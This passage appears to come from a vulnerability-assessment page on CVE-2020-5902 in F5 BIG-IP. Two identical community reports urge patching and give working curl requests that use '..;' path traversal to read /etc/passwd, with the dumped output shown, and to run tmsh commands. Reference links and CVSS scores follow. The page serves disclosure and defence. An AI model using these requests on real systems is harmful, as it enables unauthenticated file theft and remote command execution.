OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
wvu-r7 at September 03, 2020 5:15pm UTC reported:
This one is Critical to patch quickly with a CVSS Score of 10.
If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All version of Big IP from 11.x through 15.x are vulnerable.
Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unathenticated RCE to Authenticated RCE, Which is still bad.
Refer to the F5 Article for details. – <https://support.f5.com/csp/article/K52145254>
If you are using AWS, Azure, GCP cloud images Check the version number is fully patched against the correct version numbers.
15.1.0.2-0.0.9
Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.
The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built in functions to gain file read / write or you can access the web based shell to create accounts with shell access.
Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:
File read
File Write
tmsh access
curl --insecure ‘https://f5-bigip.home.lab:8443/tmui/login.jsp/…;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’
{“output”:“root:x:0:0:root:/root:/sbin/nologin\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ntmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin\nadmin:x:0:500:Admin User:/home/admin:/bin/bash\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:/:/sbin/nologin\nsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologin\npolkitd:x:27:27:User for polkitd:/:/sbin/nologin\nnslcd:x:65:55:LDAP Client User:/:/sbin/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\npostgres:x:26:26:PostgreSQL Server:/var/local/pgsql/data:/sbin/nologin\ntomcat:x:91:91:Apache Tomcat:/usr/share/tomcat:/sbin/nologin\nhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nrpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nf5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\noprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin\nsdm:x:191:996:sdmuser:/var/sdm:/bin/false\nnamed:x:25:25:Named:/var/named:/bin/false\napache:x:48:48:Apache:/usr/local/www:/sbin/nologin\nsyscheck:x:199:10::/:/sbin/nologin\nmysql:x:98:98:MySQL server:/var/lib/mysql:/sbin/nologin\nrestnoded:x:198:198::/:/sbin/nologin\nGuest:x:16110:500:Guest:/home/Guest:/sbin/nologin\n”}%
This doesn’t only affect the login.jsp path it can be used from anywhere.
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
miteshkwan1 at July 17, 2020 1:32pm UTC reported:
This one is Critical to patch quickly with a CVSS Score of 10.
If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All version of Big IP from 11.x through 15.x are vulnerable.
Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unathenticated RCE to Authenticated RCE, Which is still bad.
Refer to the F5 Article for details. – <https://support.f5.com/csp/article/K52145254>
If you are using AWS, Azure, GCP cloud images Check the version number is fully patched against the correct version numbers.
15.1.0.2-0.0.9
Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.
The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built in functions to gain file read / write or you can access the web based shell to create accounts with shell access.
Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:
File read
File Write
tmsh access
curl --insecure ‘https://f5-bigip.home.lab:8443/tmui/login.jsp/…;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’
{“output”:“root:x:0:0:root:/root:/sbin/nologin\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ntmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin\nadmin:x:0:500:Admin User:/home/admin:/bin/bash\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:/:/sbin/nologin\nsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologin\npolkitd:x:27:27:User for polkitd:/:/sbin/nologin\nnslcd:x:65:55:LDAP Client User:/:/sbin/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\npostgres:x:26:26:PostgreSQL Server:/var/local/pgsql/data:/sbin/nologin\ntomcat:x:91:91:Apache Tomcat:/usr/share/tomcat:/sbin/nologin\nhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nrpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nf5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\noprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin\nsdm:x:191:996:sdmuser:/var/sdm:/bin/false\nnamed:x:25:25:Named:/var/named:/bin/false\napache:x:48:48:Apache:/usr/local/www:/sbin/nologin\nsyscheck:x:199:10::/:/sbin/nologin\nmysql:x:98:98:MySQL server:/var/lib/mysql:/sbin/nologin\nrestnoded:x:198:198::/:/sbin/nologin\nGuest:x:16110:500:Guest:/home/Guest:/sbin/nologin\n”}%
This doesn’t only affect the login.jsp path it can be used from anywhere.
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5
packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html
packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html
packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html
packetstormsecurity.com/files/158414/Checker-CVE-2020-5902.html
packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html
packetstormsecurity.com/files/175671/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html
badpackets.net/over-3000-f5-big-ip-endpoints-vulnerable-to-cve-2020-5902/
blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902
github.com/corelight/CVE-2020-5902-F5BigIP
github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902
github.com/rapid7/metasploit-framework/pull/13807
otx.alienvault.com/pulse/5f282c78953c1baee1f9b01b
research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence
support.f5.com/csp/article/K52145254
swarm.ptsecurity.com/rce-in-f5-big-ip/
us-cert.cisa.gov/ncas/alerts/aa20-206a
us-cert.cisa.gov/ncas/alerts/aa20-259a
www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/
www.kb.cert.org/vuls/id/290915
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
100.0%